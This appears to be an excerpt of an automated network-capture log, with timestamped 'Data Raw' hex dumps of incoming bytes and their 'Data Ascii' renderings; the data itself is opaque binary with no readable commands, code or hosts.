                                                                                                    2023-10-24 04:55:22 UTC3942INData Raw: 4d 1b 0d a4 64 fe 05 d2 e0 69 1e e2 ab f3 4e a6 58 28 1a 56 95 95 46 d6 dd c5 13 95 ed 61 f2 09 ce 5c 68 3d 39 26 99 8a 96 83 37 cc 21 3f bc 99 37 3a f3 23 26 45 be 62 bb 3b bf 60 2d ef 8f bf cf ec ba b0 94 13 7a a0 d5 21 14 75 87 d1 3e d9 a8 a7 fc 40 3e f5 e4 8b 40 c4 76 76 fc 6a 25 57 ec 60 c2 3c f4 96 ca 19 d5 d6 4b 89 7e ed 77 b7 17 06 12 67 9f 16 42 b9 21 ca 3d b9 9d 1d f7 64 02 dd 92 85 de f5 fb 5a 42 6a a1 25 b0 50 28 ce 9c 48 3c 4d 06 5c f5 63 15 ee c8 2f 13 6a ac c9 c6 9f 81 0d 6d ef d2 d3 c4 2e 60 90 4d d5 75 98 01 bd 74 6b ed bd 8c 82 38 21 67 cf 67 d2 ed 93 02 a2 5d 27 ad aa 33 e0 ba fc 5f 4c 01 c8 19 e1 23 49 86 61 2a 15 34 22 d3 22 a4 9b 3b 37 ae 5f cc 82 0d e0 5e f6 53 c3 0e c6 cf c3 12 07 bd a8 22 09 e8 26 9d 07 53 fa c5 61 5a f6 b9 ea fc
                                                                                                    Data Ascii: MdiNX(VFa\h=9&7!?7:#&Eb;`-z!u>@>@vvj%W`<K~wgB!=dZBj%P(H<M\c/jm.`Mutk8!gg]'3_L#Ia*4"";7_^S"&SaZ
                                                                                                    2023-10-24 04:55:22 UTC3949INData Raw: a3 1b 9b c5 a4 a4 a6 7c a7 52 35 93 2e 53 49 6e 4c 28 4b ea 54 8c 4a d4 82 5a 4f 8b 52 75 83 f0 75 88 e4 2c 7c e4 4d 69 50 fb 82 90 f0 24 4f cd 52 67 4e c9 46 31 49 9f e6 37 e7 21 03 d9 e2 9d 44 e8 2f 68 31 5e a8 24 a0 31 63 2a ec ad b4 df 89 83 a3 70 e9 45 9c 47 26 49 d8 4a b4 6f 30 70 de 75 88 cf 07 d5 0f 7e 84 87 b6 88 f8 84 9a e5 9b 78 2a 80 6c 82 ee 7f 10 c9 c2 af 44 ef cf e0 11 f6 79 10 71 f5 d0 c3 00 90 ea 99 8b 85 83 dd ce f3 7c 91 ee ba 87 3d 77 d5 d8 d6 f0 18 9e 9f c0 a1 dd b7 e4 79 eb eb db 4d ee cf eb 07 1d a3 df 24 7e 89 83 bb 8c 58 52 91 52 c7 91 56 03 12 eb ef d8 71 05 96 f3 15 34 35 bb 61 b1 63 a4 e5 be 95 e3 11 0d 09 31 ff a6 d3 05 d5 8f 7a 00 73 bc 86 25 d1 5f d3 da 8c 67 8d 74 8f a7 95 9e 17 20 2d 92 25 b5 5f ac e1 9f c3 c6 85 bf fd 58
                                                                                                    Data Ascii: |R5.SInL(KTJZORuu,|MiP$ORgNF1I7!D/h1^$1c*pEG&IJo0pu~x*lDyq|=wyM$~XRRVq45ac1zs%_gt -%_X
                                                                                                    2023-10-24 04:55:22 UTC3957INData Raw: 0d 3f 8c f6 92 0c 11 b1 5f 10 63 64 22 8b 22 5d a8 94 1d 8d 23 a8 af cc 5d 38 25 5e ba b7 f7 11 b4 f5 38 e6 12 e4 77 33 0f 2f 52 00 7e c2 79 86 7e 40 a9 2b cd 7d 2b d5 b2 b9 b9 91 c2 dd 07 f2 06 72 af 22 49 8c fe 64 db 5e 0f 31 60 33 21 06 5f 7f f1 c0 db b1 d9 7e 2d 22 5f f3 be be 33 e4 f4 ee 99 27 ee 8d 84 b6 4c 84 5e dd 6a 87 f5 a8 9b b5 ed c8 2e 27 5a c9 7e 49 2f 94 71 db 6f 4e 17 d0 a3 cb 7d 0e 80 25 74 eb 0b ef 37 d4 b7 f7 be 4d 85 5f de 6b 88 f6 9f 9c b6 ee c9 ef 1a 1f ad 09 15 97 9d 4e 52 14 1b 1c 1d 1e 5e 5b 65 5c c7 5c 7b 9e 1d 1e 1b 6a 60 85 7a 81 80 2a 86 8b 7c 46 63 87 80 89 5d 8b 84 8d 89 77 1b 64 7e 80 8f 1e 28 21 69 85 87 1a 20 1f 72 85 81 92 7d 19 10 18 1f 62 80 85 84 86 89 18 4f 24 69 83 7e 90 92 90 7a 44 5b 79 8d 7b 25 b2 40 1e 15 1f 6b
                                                                                                    Data Ascii: ?_cd""]#]8%^8w3/R~y~@+}+r"Id^1`3!_~-"_3'L^j.'Z~I/qoN}%t7M_kNR^[e\\{j`z*|Fc]wd~(!i r}bO$i~zD[y{%@k
                                                                                                    2023-10-24 04:55:22 UTC3965INData Raw: 62 fa 36 5a b3 8f 1f 07 2b bb b6 fe a7 b8 d0 a9 19 1b ac 64 8b a3 c4 6d fc a7 08 8d 86 ba 36 f5 65 d0 70 ca c2 82 79 c0 c2 5f 39 bc 19 d5 ad 0a af fb 18 eb 1a 3e 68 dc 36 55 a0 cf 8a 43 7b c6 82 7b 55 ac 05 fe 61 98 18 ec 44 68 77 d8 e6 60 e6 72 2b a8 e8 bd 0c a1 3e 6c 14 63 54 e1 c6 81 f6 57 5f 39 41 6a 29 5e f0 cc 56 a4 5d 21 f2 bc 14 47 26 6e 22 2d 50 c5 7b d1 1a 71 53 3f d0 96 29 e3 db c9 df 3f 15 cf 7c b2 8e 04 d1 07 92 a3 8f 3a 60 4f ac a6 ce a4 74 3a 57 c3 be ef 86 cd 88 30 a6 0e c3 31 d8 16 69 54 42 83 9e 6f d1 3e b8 3a 7f 6b b0 d0 d1 75 54 7d e7 83 f2 2f ae 35 ac 7d 11 f8 66 2c ad 09 02 f2 be 19 ef de 2d c9 6d 43 1d b2 b9 18 7b a5 17 6f 68 52 de bb 2a 64 75 22 d5 58 e5 79 13 1d 3a 58 63 70 3c 55 47 91 67 cf 66 69 b2 0c 59 c7 42 c8 0c 32 c4 06 88
                                                                                                    Data Ascii: b6Z+dm6epy_9>h6UC{{UaDhw`r+>lcTW_9Aj)^V]!G&n"-P{qS?)?|:`Ot:W01iTBo>:kuT}/5}f,-mC{ohR*du"Xy:Xcp<UGgfiYB2
                                                                                                    2023-10-24 04:55:22 UTC3973INData Raw: a7 74 7e a7 f2 d6 12 4f 21 49 8f 64 8a 73 2a 96 62 03 12 cc d2 85 e7 9c 17 c4 5f 0b c7 f9 62 97 8c 56 cc 06 05 38 45 cc a6 34 b7 75 ad 07 81 de a5 4e 57 e2 79 92 14 d2 f3 42 ad 8e 4c 4e fb ee 51 0b 7f 33 88 01 61 91 ed 51 9f 61 49 3b b9 5e 34 41 76 21 f7 81 10 03 c3 0d 62 0f 0b 87 c8 ef 8e 10 ce 6f 8b 23 40 49 d7 d9 c1 be a1 7b f3 2f 7e c9 f7 dd fe ac 9e 6b 9b eb 8f 58 05 85 ed 99 7b 1d a7 de 37 37 3b f2 a7 63 37 90 f8 a5 07 64 01 d1 de 4d 71 5a 2a c9 2a 13 c9 1a 5f 50 37 0f 9b ce e0 19 2f e8 34 b4 3d c6 4d a6 65 67 fd e9 5b 90 f0 d0 cc 80 15 2b e0 6b e1 4e 40 ae bd 11 e4 4b 86 2b 8b 21 96 f1 6e 89 ff d2 0b 30 31 48 53 c8 db 0c 6b 8f 0a 47 7a 7d 07 fe b4 2e 82 bc 9e 7c d8 47 48 c7 ee c3 82 90 cc 51 f8 42 b7 9e ce 57 f6 d2 6f 4a df 28 bf ad c1 62 3f 9d af
                                                                                                    Data Ascii: t~O!Ids*b_bV8E4uNWyBLNQ3aQaI;^4Av!bo#@I{/~kX{77;c7dMqZ**_P7/4=Meg[+kN@K+!n01HSkGz}.|GHQBWoJ(b?
                                                                                                    2023-10-24 04:55:22 UTC3981INData Raw: 8d 9d f2 ea db aa d8 fa 2f 32 73 eb 80 be 20 8d a2 5e 41 f3 ec ee 21 e5 73 cb 2f 77 b2 3f 4f 6e d3 49 50 2a c6 e2 00 50 b6 04 11 34 ef b8 3b e3 b8 f0 41 c6 89 b6 67 94 b9 42 a5 6d 7a 79 20 ad 1e b6 06 8b 85 39 5a 03 a2 ce 57 a1 1a be e3 7f 09 ff c3 af fb 76 1e 58 ed c0 19 bf d6 45 6e 71 3a 3f 56 21 a3 da 45 88 4b fc 50 d9 20 a2 79 4c a6 ba b2 0a 68 eb 94 be 3d 17 9c 49 56 fb 09 e8 ea 5e 88 0d 94 95 b4 bd 1d 2e 2d d3 48 29 46 a7 57 52 ea b5 31 21 32 8d 28 b9 1f b5 6e cd 06 6d 3b 37 b6 00 29 2a f6 67 4a b5 13 2a 28 16 91 21 4f 10 62 d5 78 48 16 cc cd 5f ea 4e 6c df 87 dd 63 23 cd 85 fe b8 1a 03 ca 29 e9 da da ea 5a e6 8c 31 1f 2a 1f 97 d6 3d ba 04 db 20 b2 cd 95 39 2e 96 f6 44 bc 5d f6 50 6b 77 b0 e6 47 97 4e 1c 3e 13 82 96 b5 a0 13 62 de 91 7a c0 c8 d9 a5
                                                                                                    Data Ascii: /2s ^A!s/w?OnIP*P4;AgBmzy 9ZWvXEnq:?V!EKP yLh=IV^.-H)FWR1!2(nm;7)*gJ*(!ObxH_Nlc#)Z1*= 9.D]PkwGN>bz
                                                                                                    2023-10-24 04:55:22 UTC3988INData Raw: c0 63 8d d1 b5 cd fb f1 10 99 1e 20 7b 6b fc a2 7e 0e 8a d3 34 6c 87 4f b4 7d ce 0a ee 6b 4d 0d 7c 19 d6 04 b3 f2 f6 eb d5 9e 7c 11 92 23 5a 3b 09 33 a2 e5 f0 49 53 49 79 45 e8 74 e7 fd 16 e6 f9 c9 3f 53 b6 7c 36 7c 2b a3 db d5 92 63 26 b9 29 90 c8 ee 23 93 b7 94 fd 35 92 30 ca a4 f8 67 d3 70 6a 7e ed 99 1b cb df 06 17 9c ad 54 94 1a ba c8 2f 11 7d ea ad 30 b8 44 97 56 ab 76 bb 62 33 41 c2 de d8 42 04 b0 70 79 76 2d 95 75 cf f7 c1 7b fe e4 2d 92 5f ab 3b 42 c2 cc bf a3 79 27 54 8a 19 2b d1 08 75 2b fa 3d 51 a8 c4 2e 1a 93 54 97 db 32 22 c7 33 71 52 fa 0d 8e 8a c6 4e fd 86 21 06 31 fa b4 9f 60 db 03 1b db 0b d0 7e 1c 64 a0 6e d3 06 55 df d3 28 0e b1 07 17 60 0a 01 45 aa 54 40 68 7b 76 f4 e4 4d 1d a4 7a ae 5e 82 f0 45 eb 51 ed 2e a5 d1 1a 34 8a 0b 99 2d de
                                                                                                    Data Ascii: c {k~4lO}kM||#Z;3ISIyEt?S|6|+c&)#50gpj~T/}0DVvb3ABpyv-u{-_;By'T+u+=Q.T2"3qRN!1`~dnU(`ET@h{vMz^EQ.4-
                                                                                                    2023-10-24 04:55:22 UTC3996INData Raw: a6 0b 67 16 31 8b 2f 76 b4 eb 38 f3 93 a6 7e c7 72 49 cd 77 d9 e8 1b f5 ee 54 5b 65 43 79 03 f2 7e e2 be a5 bb b9 27 e9 ec 56 69 e9 d9 c7 a2 42 e4 47 1b c6 e4 2f 4c ce 83 f7 8f 14 d4 54 d2 3d 58 f3 94 fd c0 e1 c7 c9 9f b7 de 63 41 38 64 9f 9f ad e9 df 67 47 ef fd 04 a2 4e aa 76 53 6b 0e 98 be 55 dc 42 78 19 97 77 31 f2 2a 33 c9 82 b9 51 ab 23 5d 81 d2 7f df d7 ee a8 b3 61 9f 9b a5 58 63 9e dd 70 ad 12 57 54 d4 e7 c5 40 34 81 d2 1e 91 a0 19 84 65 e9 50 46 76 e2 14 86 33 c0 e7 0d 95 54 e3 1f a1 cf c6 2c 25 30 d8 72 84 7d 9d a7 87 52 af b9 54 5e bd 5b fd 6c be e4 99 3a 36 99 51 49 45 a2 89 8b 37 bf 4f 46 42 0a 08 28 4e 56 f9 16 0d 72 04 71 2b 8b b8 48 33 f5 0a f6 75 1f a9 92 74 2f d9 b4 16 a1 f7 39 45 92 0a 72 c1 0b 31 bd 78 06 78 0b 83 a4 5f c4 59 02 90 c1
                                                                                                    Data Ascii: g1/v8~rIwT[eCy~'ViBG/LT=XcA8dgGNvSkUBxw1*3Q#]aXcpWT@4ePFv3T,%0r}RT^[l:6QIE7OFB(NVrq+H3ut/9Er1xx_Y
                                                                                                    2023-10-24 04:55:22 UTC4004INData Raw: 53 45 7a 15 a2 1a 9b c3 ec 89 82 81 3b 73 d5 34 7d d8 db 77 3a e8 f9 e9 23 b4 2b 01 a9 1c 09 ad aa fc f5 4e 1e 9f f3 d7 e7 fd d9 13 56 92 19 5f 62 40 bb 43 1e 76 58 39 ef ac 78 9e e7 b5 49 75 e4 48 b6 f2 f1 65 d6 b5 0a e4 56 fd 0d 2a 12 12 85 2e 42 12 65 5c e2 03 03 4d 87 05 0d 85 cd 53 a1 7c db fa 0f 1c 87 7b f9 92 5f bf 0f a5 da dd 6c a5 a2 c5 91 93 56 1f 47 8c 12 3b 10 c4 60 a2 a1 b5 03 b7 70 20 15 d5 16 8c 74 0b 17 5d 47 d2 a7 41 b6 e1 fc c6 1c 47 4e 74 43 65 3f 59 e3 a4 27 10 b9 43 12 2f e8 4c fd 75 0b 30 39 c5 03 29 1d 7a 07 7f eb 7b f9 53 45 16 52 04 8c c3 97 86 e0 ae e9 c0 bc 16 c1 a7 84 f6 fa 36 3a e0 28 57 b6 c5 d8 6d 55 2a 4c d6 02 a6 2b a0 a8 13 6d 74 3f 58 07 9e 03 a9 f4 c8 e0 71 78 e7 a0 74 ec 99 b6 75 ef 17 21 f9 37 38 2f 38 cc 49 ad 16 0c
                                                                                                    Data Ascii: SEz;s4}w:#+NV_b@CvX9xIuHeV*.Be\MS|{_lVG;`p t]GAGNtCe?Y'C/Lu09)z{SER6:(WmU*L+mt?Xqxtu!78/8I
                                                                                                    2023-10-24 04:55:22 UTC4012INData Raw: 7c 86 66 6d c5 db f8 cd d9 29 e5 9d dc 01 fe 12 60 3d 63 29 19 5d 04 8c e1 15 f7 47 ea 7a f9 bb 83 ee 0e c7 2b 10 25 51 ab 3d 68 a4 cf c9 3e fd 87 3e f1 d2 40 7e 8a 41 b0 29 86 a2 0a da 2a d6 ff c5 de 7b 07 45 f5 ad 79 bf 06 44 01 c9 39 07 c9 49 41 72 92 dc dd d0 0d 4d 93 73 06 c9 92 24 75 a0 9b 26 36 a1 c9 49 40 24 07 91 24 49 40 92 80 80 64 10 90 8c 08 22 82 04 89 a2 17 3d e7 cc 9c 79 6b ee cc 9d 5b e7 de 7a eb ad df 1f 5d b5 6a 77 af b5 76 af b5 bf bb ea d9 cf e7 fb ec d4 a6 9f 9d 57 b9 df ec 7e 9f b0 ba 6a dd 3b 59 6a 6f a5 79 ae c1 24 65 3e 7b c0 34 ea ac 48 8f 4a 29 33 a8 d5 a3 0f 7f dd 64 6b 23 5f ec d3 23 72 5b 84 d1 df 33 7a 84 23 b1 2c b5 57 6d eb e9 ee 2a ab bf df 19 8f 92 4b f6 f7 9f 39 b2 14 b8 9e 83 64 fe 2c ed 03 79 95 f7 d8 c6 a0 b2 db 57
                                                                                                    Data Ascii: |fm)`=c)]Gz+%Q=h>>@~A)*{EyD9IArMs$u&6I@$$I@d"=yk[z]jwvW~j;Yjoy$e>{4HJ)3dk#_#r[3z#,Wm*K9d,yW
                                                                                                    2023-10-24 04:55:22 UTC4020INData Raw: ff 4e d9 7a a3 13 12 91 e1 e1 86 f2 60 10 04 02 06 02 ff 8c 8c 8f c0 86 fc e6 81 51 d1 78 64 d2 9f 6f b5 ff f4 b8 d4 91 be 65 1c fa f2 4e 1a e5 16 19 15 61 a2 f4 9b c1 95 d6 02 68 6b ff 63 25 0d 1e a2 13 51 41 01 b8 20 cb 90 04 b4 99 32 40 13 a4 a5 af 0d 36 d2 31 76 01 40 60 60 6d 43 5d 1d 6d 0d 90 1e 10 f4 87 c5 be 5c 67 98 53 34 2a 3c 2c dd 34 00 87 30 52 80 80 75 a1 ba 00 20 4c 4b df 0b a2 6f 02 04 e8 69 5f 0e ad 6b ac a3 21 f3 87 8f 35 49 c5 85 db 3b c0 6c c3 e2 f1 b1 f8 78 83 3f 5c d0 1f 5d ba 22 62 fe 46 98 fe 8d 51 8f 8a f8 3b 61 15 8f b7 4b 89 86 06 86 fc a6 d5 cd 94 a3 02 e2 10 08 85 ff c0 d6 a2 11 01 e1 28 24 d2 44 e9 6f 54 f6 e5 78 09 89 f6 b8 18 3d 74 64 5c 02 02 87 0e fe c7 0e 46 5e ee 20 18 a5 8f 36 44 1a 82 d5 40 c0 4b 5d 40 f5 c3 00 6a 81
                                                                                                    Data Ascii: Nz`QxdoeNahkc%QA 2@61v@``mC]m\gS4*<,40Ru LKoi_k!5I;lx?\]"bFQ;aK($DoTx=td\F^ 6D@K]@j
                                                                                                    2023-10-24 04:55:22 UTC4027INData Raw: 8b 5e 0c e2 df dd 67 89 49 c9 da a9 c0 3f 2e 35 b0 a1 91 b1 ba 26 08 a0 0d 06 c6 a3 b1 aa d1 f8 88 b8 90 64 10 2e 51 e6 8f d7 c8 f8 f2 98 ae 19 1c 07 8f c5 c6 26 46 62 b1 d2 bf f3 a1 08 54 5c 4c 8c 81 dc ff c2 10 b8 d9 fd 1b 9d 10 16 ad 11 84 88 46 a0 b5 d1 d8 30 4d 7c 70 8c 16 44 5b 47 3d 0c fb 1f a8 83 3f 9e a4 ff ba 47 b4 5b 62 34 4a cb 13 93 88 c5 45 87 20 ad 13 d1 b8 24 99 3f 99 f9 bf ff 23 38 fc df bc 87 d1 09 71 51 7f 58 08 38 1c 14 1a 85 c1 05 63 71 38 a0 36 08 f2 77 3f 53 52 54 14 2e 51 f7 77 8e fe 3f b8 15 b1 91 98 08 8d 48 1c fa 77 5e 57 fd 9f 47 8e c5 84 a2 ff 73 ba e3 37 5b 01 d0 02 6a ff 07 0f 60 5c 58 e4 7f ce 5b 24 c1 63 c1 ba 6a 9a 9a ff c8 e5 db 3b c0 2c a3 91 89 bf 9d 84 36 16 46 0a 7f fc 79 c1 11 21 18 a4 e1 6f d7 20 14 01 d2 02 43 a1
                                                                                                    Data Ascii: ^gI?.5&d.Q&FbT\LF0M|pD[G=?G[b4JE $?#8qQX8cq86w?SRT.Qw?Hw^WGs7[j`\X[$cj;,6Fy!o C
                                                                                                    2023-10-24 04:55:22 UTC4035INData Raw: 3d b3 b4 f8 aa 42 55 d5 08 75 fa 41 51 fa 74 af ac 47 3d 92 22 55 e8 e8 a0 61 fe 24 5e 13 1d e9 93 5c 01 01 f8 0f d8 3e 72 0e a1 45 2c 5f 5d a2 96 76 c1 54 f5 b1 d7 cd 76 b8 7b 43 6a 4f 5f bf 65 3e f7 72 7d ef d9 da ef 46 78 c2 e9 60 b9 85 37 51 a4 27 83 54 e9 f4 c9 5e ed a3 be 7e 87 a3 de 24 b5 8f 1f 3f 8f 59 95 4d a7 7a 6a 99 6b 2b df 9e 15 8a 9b 71 7b 24 ef de 45 ef 0f 9d c6 f0 e2 0f af 98 cf 54 87 3f e7 fa 82 d3 04 5e 62 c2 f0 e8 f0 dd 0b 88 73 68 c6 0c f7 44 e1 e2 ef aa 4b 8d c9 63 c4 ed 46 57 bf ac e3 1b 0a fd 86 6c 2e a7 8a 89 02 4e 38 2e 22 dc ab 13 d6 fd f3 de 15 16 30 b7 be 9a 1d 21 64 9e c2 d7 41 b6 2c e4 bb 1b f8 26 e0 6a 57 2f ac aa da 98 8b ac 99 ba 73 ef 97 23 c4 0e 52 5b 0f 1a 29 95 ca c6 96 6c 8e b2 61 f8 c2 21 e2 be 0d 30 9c d6 ae 22 31
                                                                                                    Data Ascii: =BUuAQtG="Ua$^\>rE,_]vTv{CjO_e>r}Fx`7Q'T^~$?YMzjk+q{$ET?^bshDKcFWl.N8."0!dA,&jW/s#R[)la!0"1
                                                                                                    2023-10-24 04:55:22 UTC4043INData Raw: f9 99 b6 82 5c c3 cd 7d 65 ac a7 a7 c9 c9 fb b2 b8 32 de 93 b1 91 29 12 08 6f 7b dc 30 5f a2 d1 45 40 53 de 11 52 6e 6f 19 46 1a 07 95 84 43 c2 b0 51 b2 2e cf 0f a8 ac 8c 8d 5c 2b 6d 79 c1 da c6 c5 25 e9 17 c3 5c 4e 37 59 92 24 16 19 5b 98 1f d3 51 6a 65 f6 8a 50 3d 30 bf 9c 37 73 82 47 55 cf 36 c5 cf c2 b1 c9 75 74 0a bc 5b 0b e4 f1 1a 49 15 87 a2 cb b4 3a c3 df 23 21 90 33 5d 15 ef fb b6 8c e8 f3 08 26 01 db f8 4c e5 4a 2b 2d 06 cc 1e 4c bd 1a 50 20 53 af b1 1d 76 27 19 f1 c8 c3 21 5d bc 5e a1 b9 7c b9 66 4c 69 e1 6b c7 76 f5 34 be 5d 50 2a 4d ee cf 27 68 48 95 fe fc 50 45 5e fd b9 3d a6 ac d5 0b e9 4f ac 3e 43 09 2a 00 b5 d7 93 73 6f 7e a2 49 13 e5 60 7c 16 64 47 d0 a8 a6 98 1b 75 18 b0 b5 81 95 62 01 5d c4 e2 f1 a0 4a 74 05 14 6d 5b 3a 42 cc 79 6e a0
                                                                                                    Data Ascii: \}e2)o{0_E@SRnoFCQ.\+my%\N7Y$[QjeP=07sGU6ut[I:#!3]&LJ+-LP Sv'!]^|fLikv4]P*M'hHPE^=O>C*so~I`|dGub]Jtm[:Byn
                                                                                                    2023-10-24 04:55:22 UTC4051INData Raw: 0e 33 25 3d ad 3e 12 bf 36 21 06 eb 98 89 81 9e 53 ea 13 bc 2b 51 8a fd e5 95 2e fa 7a bb 88 68 45 9a b1 ae 9e c1 82 6c 1a e5 4e 36 4d cd 54 89 d3 bc 01 ed 70 ba d8 35 c6 92 cb ad d8 f9 b4 97 f6 8c 0c 4b 4c f3 8c 6d f0 b4 63 1c 71 91 08 a5 16 3d 40 16 97 71 97 a4 9c a7 90 1a 60 2c a4 80 14 7b 9e 77 97 f4 1c 28 a7 d0 92 4b 12 fd 86 96 56 af bc 00 07 f7 0d ff 50 0d a9 25 9e c7 c0 12 93 d9 70 97 17 13 64 2d af 70 6b ab 86 98 9b b1 1d 7c c0 58 d2 ba a7 11 0f 7b 01 b6 03 7b 8d e4 70 3e ee c7 3d 3d 7d 52 0f 86 c4 46 3c 38 1b 51 58 43 3b 29 12 16 2a 64 78 0c 18 ec 26 c8 b7 c3 38 37 be 1e 1e ad f7 61 44 f6 fb 6e 9c 72 87 fa 5e 49 8d 4e ba de 9f 4d 1c 3c bd 54 25 1e a6 8f 48 13 17 88 ee d2 e6 20 57 6c 84 a1 f5 6d 4c 6a 42 9a ae 47 f3 d5 1a 6f 69 6c ac 89 71 c2 8e
                                                                                                    Data Ascii: 3%=>6!S+Q.zhElN6MTp5KLmcq=@q`,{w(KVP%pd-pk|X{{p>==}RF<8QXC;)*dx&87aDnr^INM<T%H WlmLjBGoilq
                                                                                                    2023-10-24 04:55:22 UTC4059INData Raw: c4 e0 4f 63 12 32 1a 2d ea 5a be f3 a3 8b f4 88 b7 c8 a3 9c 77 18 78 17 43 7d 04 58 ca 48 94 c4 e4 d0 6e ac 83 7d d9 3f bf 3b 00 a0 26 75 86 3d 49 82 aa 6c 77 dd 3f 67 ff c4 54 b4 d6 10 04 87 84 aa 4a fc c9 6f 69 f5 8c 0e 1b 3d cf c3 69 aa 77 c6 ed d2 30 94 dc 92 f8 c8 d0 3f c6 20 d6 32 d2 d4 5a fa 85 20 5a 47 be 6f ce ef b9 8b d0 26 fa 5b ae 78 bd 9d 75 6b 1e 79 eb cd c1 3f 17 32 76 42 0e 81 f6 2d a3 52 a7 9a 07 33 50 e2 1b 7e 24 97 f4 64 18 ce c4 db fa c9 9f cf 9d ed 54 79 38 39 f2 3b b6 c1 f5 28 d6 25 68 42 21 e1 bd a7 f3 0e 53 9e 77 ad 44 c6 4f 7e b1 e8 2d 58 d2 b8 db a4 74 3e 34 92 29 8d 60 b5 a1 43 0e 00 f7 18 73 e4 4e 82 ba 18 71 a7 0f 86 5b ea ef 3b e5 5c 77 ca 02 30 d3 95 a3 51 dc e5 0a 1c 2d 1a fd 55 c7 01 68 ad 23 11 e3 63 7c 54 5e 4d a5 36 ad
                                                                                                    Data Ascii: Oc2-ZwxC}XHn}?;&u=Ilw?gTJoi=iw0? 2Z ZGo&[xuky?2vB-R3P~$dTy89;(%hB!SwDO~-Xt>4)`CsNq[;\w0Q-Uh#c|T^M6
                                                                                                    2023-10-24 04:55:22 UTC4067INData Raw: 63 f8 fc 16 9a da 94 29 97 2f 35 b4 38 d0 31 97 7b 01 30 f3 26 40 f6 7e 7f 26 58 9e 6d f1 32 c9 ef 96 dd b3 c6 5e f6 9c c8 9a 8f c1 85 f7 99 8d 9c 6c 84 5b 25 5f 9e a1 ec 7c 18 73 10 f7 87 65 08 48 5c 12 4b aa 54 8d 8a 70 5f f5 89 f9 58 0b 77 a4 cf 40 fa 05 56 5b 70 4d 19 29 a9 8a e3 57 9b bb 31 02 69 21 76 d7 f4 f7 ec af 5f 87 3c 52 48 52 74 9b 99 9e f1 1d 74 ae f0 70 21 09 30 47 79 1f bf 64 cd 1b af 61 18 cc 74 42 f0 d8 34 67 63 49 73 93 49 86 2d 63 59 b1 a0 f0 76 5d 66 f9 4b 9c fd d7 11 98 aa c8 68 c7 75 a3 62 8b 56 5f 29 1c 72 aa 3a eb 8f 1f e1 ab 92 f9 21 a8 88 28 3a 6c d9 83 a6 b7 24 0c e9 8a c6 1c 89 40 58 42 49 b9 c1 d7 f4 c7 28 85 d4 5d d6 37 2c 8e ae d9 b3 0e 59 0f 49 eb 6b f6 25 75 1a 9f 82 1c b6 d3 0f 7c fd 8a 64 aa db 27 44 9e 72 46 a1 9b fa
                                                                                                    Data Ascii: c)/581{0&@~&Xm2^l[%_|seH\KTp_Xw@V[pM)W1i!v_<RHRttp!0GydatB4gcIsI-cYv]fKhubV_)r:!(:l$@XBI(]7,YIk%u|d'DrF
                                                                                                    2023-10-24 04:55:22 UTC4074INData Raw: e7 39 75 96 06 0a 32 88 6d db 28 72 76 a5 c3 1d 08 21 51 ed c4 72 62 1d 4c 64 75 f4 21 65 ec d6 fb b8 44 84 ea 03 cf 69 91 5f f4 1c f7 5b cb 1f a7 f7 02 d9 eb bf c5 1a aa e4 84 e1 3f 1d c9 38 cf d6 fa 82 5b 1d 21 ff 96 1f eb be f8 7a e1 51 46 78 11 92 f0 7d 5e 6d 8b 52 d4 36 b0 92 7d 27 48 cc d5 39 5a c5 52 38 2f 7e ed 34 6e 43 bf 69 e5 b8 65 76 fa 23 e3 f1 8b 48 0e 6b d5 4f 43 cc e1 25 a1 74 02 97 d3 d4 40 11 0b a8 ca b9 8e c2 db 1f 35 4f 6d 76 db f2 94 9a c8 06 0e cd 7a 04 de 6f f0 bd bb 88 c6 46 d7 2c 58 c8 40 d9 ab e8 93 db 18 9b 95 60 35 69 28 44 8c a0 fc 7c f9 84 a5 77 bf e1 23 57 64 00 1a 63 f0 b5 df 7a ee 92 b3 d4 1b 8c bb 43 29 df fd 8c 1e 13 dd 6e 86 e4 de 65 d4 cf 68 45 fa 15 86 01 c1 72 d3 b7 78 09 e9 25 cb 91 db ad 70 53 81 e8 b6 9b 19 7c 72
                                                                                                    Data Ascii: 9u2m(rv!QrbLdu!eDi_[?8[!zQFx}^mR6}'H9ZR8/~4nCiev#HkOC%t@5OmvzoF,X@`5i(D|w#WdczC)nehErx%pS|r
                                                                                                    2023-10-24 04:55:22 UTC4082INData Raw: bd f4 77 78 2c 65 eb e0 64 21 7e aa 01 62 9b a9 d9 17 c2 f6 9f ef a4 38 00 5c b7 07 fe c5 8a df d4 a0 07 2a d1 82 66 a2 c4 34 03 22 ee 3a f1 94 d6 4d d5 d6 4b a1 c6 68 d4 6c d2 f8 a6 eb 2d d6 5f dc 48 11 f3 d6 79 62 40 74 f0 f0 25 7d 58 ab ca 9f 04 91 86 a8 23 2d f5 75 e5 46 8a 51 12 3e fb e3 70 e1 26 38 3a 0b fb d5 13 87 de 49 10 84 f4 a6 d5 b2 0d b1 9e 04 0a c4 c7 49 66 a0 70 8a 15 f3 96 e8 7e 4d 3b b3 f0 9c cd 79 f5 23 3a 6d 70 82 19 f0 25 f5 89 eb 67 42 de db 7b 6d e1 77 95 21 90 ee 9f 07 fc 2b b4 7b 92 e5 07 af a8 d3 8f bf d8 3f 37 1f 18 da d4 73 c7 29 13 29 dd 88 17 e9 1f c6 93 8c e0 7e d4 88 5f 71 9e a9 99 83 f1 a5 19 d9 fd 58 00 72 bf e3 32 33 28 c2 b0 36 1b 30 87 3c e0 31 64 b6 07 53 ea 30 bb c6 13 a1 41 0a 24 1f e5 17 52 ac e2 52 1d 32 ad 98 dd
                                                                                                    Data Ascii: wx,ed!~b8\*f4":MKhl-_Hyb@t%}X#-uFQ>p&8:IIfp~M;y#:mp%gB{mw!+{?7s))~_qXr23(60<1dS0A$RR2
                                                                                                    2023-10-24 04:55:22 UTC4090INData Raw: de 26 3f 41 a4 da 8a fb 2e 73 6a 1e b1 dd c3 03 91 a3 c2 ce d6 a5 5d 2b 0b 43 88 da 35 da 38 24 de 52 66 c3 53 0b 89 6a 22 32 2b b7 85 39 18 b1 c2 1f d7 34 df 8b 20 fc 9b 44 f1 48 16 b5 2f 01 42 5d 8d 3d ff bf 4d 4b a3 a8 ec bc 56 e6 de a4 4a af 5c 2d 8b ef de 8e c0 cf 57 28 67 88 ae 77 73 55 91 5e eb f3 6b f1 47 80 39 93 96 59 58 39 8d a6 fe 0b f6 90 79 b9 f9 6b 45 2b 20 f2 db 3b ba d4 a9 1f 24 67 72 3e 46 70 44 6b f4 8b d9 df 09 01 fd f5 0c a1 c3 10 dc c0 48 92 61 23 9f fb 0f 0d 96 f0 a1 7c e3 7c d8 be 38 5f 45 fe 2f d2 81 01 85 f0 b0 5d d4 23 27 51 09 28 dc a6 88 03 34 86 bd c1 90 bb 9e 63 b4 43 9f 30 92 7d f3 14 